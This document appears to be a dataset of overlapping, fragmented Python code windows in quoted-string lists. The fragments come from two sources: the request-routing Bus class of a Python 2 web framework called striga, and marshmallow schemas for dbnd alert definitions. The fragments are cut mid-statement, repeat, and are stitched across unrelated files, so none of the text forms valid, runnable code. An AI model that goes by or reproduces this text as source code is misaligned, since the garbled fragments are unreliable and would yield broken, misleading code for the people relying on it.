os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self,", "item root directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root", "bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try:", "== 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if 
val == '': val =", "None) if bm is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site", "= None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import", "self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not", "path = None, index = None, rootdir = '.'): ''' @param path -", "hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def", "self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None,", "is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already", "if bm is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus", "bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if", "(call each) in the begining self.CrossroadBusItems = {} #Check path against this, if", "when not found anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus", "path, createitemfnct): if path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default", "logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE =", "self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems self.RootDir = None", "self try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check", "if ok, call item from that self.DefaultBusItem = None #Call when not found", "rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename,", "is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = 
ctx.err.excvalue.Name else: L.exception(\"Generic exception during", "name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): '''", "SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for ibm", "ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue,", "index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self)", "has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus =", "= 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path,", "None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0)", "pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): '''", "Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename,", "directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" %", "ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for", "in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'):", "__configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): ''' Config keyword -", "in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm", "configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self,", "exist: '%s'\" % (self.RootDir)) self.Index = index defs = {} 
for key, fn", "= os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root", "Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path =", "'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name,", "begining self.CrossroadBusItems = {} #Check path against this, if ok, call item from", "= '.'): if self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus", "raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'):", "path - can be None as location can be default sitebus item too", "(you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False", "= conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar,", "''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir,", "os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name,", "in the begining self.CrossroadBusItems = {} #Check path against this, if ok, call", "in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus,", "directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs = {} for", "that self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems self.RootDir =", "path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise", "conffilename, name, 
default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path", "source, entry, path = None, pathlimit = '==0', rootdir = '.'): ''' Config", "= rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def", "if len(path) == 0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\")", "self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' :", "self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem =", "already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus()", "return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path)", "None as location can be default sitebus item too ''' from ._stsvcsb_location import", "import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def", "L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm", "if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if", "the begining self.CrossroadBusItems = {} #Check path against this, if ok, call item", "rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir))", "'%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return", "is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path not", "not None: 
self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for", "def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item", "self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart()", "else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0],", "conffilename, pattern, path = None, buffersize = 64*1024): ''' Config keyword - serve", "except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue", "raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for", "point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location']", "key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus'", "= ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir)" ]
[ "class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value, [0.0, 1.0, 1.2])", "import unittest from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0", "import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value, [0.0,", "unittest from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0", "from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value, [0.0, 1.0,", "vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value,", "from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>')", "<reponame>akiraakaishi/vasputils import unittest from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v =" ]
[ "= fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr", "return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if", "alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True)", "obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs):", "Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system =", "API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs", "= fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True)", "None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid =", "\"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type of", "class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric =", "= fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True)", "fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\",", "Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert 
# -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta", "_get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict,", "Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for", "fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric", "if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value", "prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value is not None:", "fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True)", "get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source", "owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True)", "= fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description =", "fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name =", "fields.Str(allow_none=True) # Operation type (e.g. 
\"read\", \"write\", None=any) to filter stats by operation_type", "by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def:", "= fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id =", "fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True)", "# -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to", "the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner", "airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid", "class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator =", "stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used", "fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name", "# Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system", "-------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. 
\"read\", \"write\", None=any) to filter", "custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description", "GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True)", "to filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in", "= fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator =", "fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\",", "Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs =", "of MetricRule, found in dbnd_web. 
Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True)", "get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if", "# TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name =", "return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True)", "alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id", "fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert,", "value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True)", "import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema):", "fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity", "= fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\")", "fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API:", "alert_def: alert_def.owner == \"system\", 
dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self,", "seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(),", "job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True)", "by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to", "filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web.", "Operation type (e.g. \"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True)", "UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner ==", "fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name", "fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description", "= fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # --------------------------------------", "\"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env", "= fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs", "fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert 
= fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert", "fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner =", "operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to build", "fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules", "class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True)", "original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert", "fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id", "fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert,", "fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) #", "= fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True,", "operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name", "fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) #", "\"write\", 
None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule,", "alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj):", "DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name =", "allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs):", "= fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert", "fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True)", "fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def", "found in dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used", "MetricRule, found in dbnd_web. 
Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) #", "= fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value =", "fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr =", "fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\")", "project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value", "data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True)", "severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert", "= fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json =", "value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True)", "return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\",", "is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env", "fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = 
fields.Int(allow_none=True)", "scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate", "**kwargs): value = data.get(\"value\", None) if value is not None: data[\"value\"] = str(data[\"value\"])", "fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator", "user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True)", "fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value", "= fields.Str() operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name =", "pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity =", "None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found", "lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def", "datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert", "= fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid =", "def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data:", "airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = 
fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool()", "allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description =", "jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self,", "value is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type =", "fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta", "affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\",", "ApiStrictSchema from dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back =", "dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def", "in dbnd_web. 
Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used only", "== \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return", "= fields.List(fields.Dict(), allow_none=True) # Used only used by the UI affected_datasets = fields.List(fields.Dict(),", "dict, **kwargs): value = data.get(\"value\", None) if value is not None: data[\"value\"] =", "= fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary =", "dbnd._vendor.marshmallow import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class", "= fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid =", "# Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to", "fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True)", "alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary", "= fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\")", "fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True)", "fields.Str(allow_none=True) 
scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields", "fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs =", "-------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids =", "custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value", "= fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True)", "= fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # --------------------------------------", "if value is not None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type", "AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str()", "task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json", "fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator = fields.Str() is_str_value = fields.Bool()", "return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def", "= fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name =", "from 
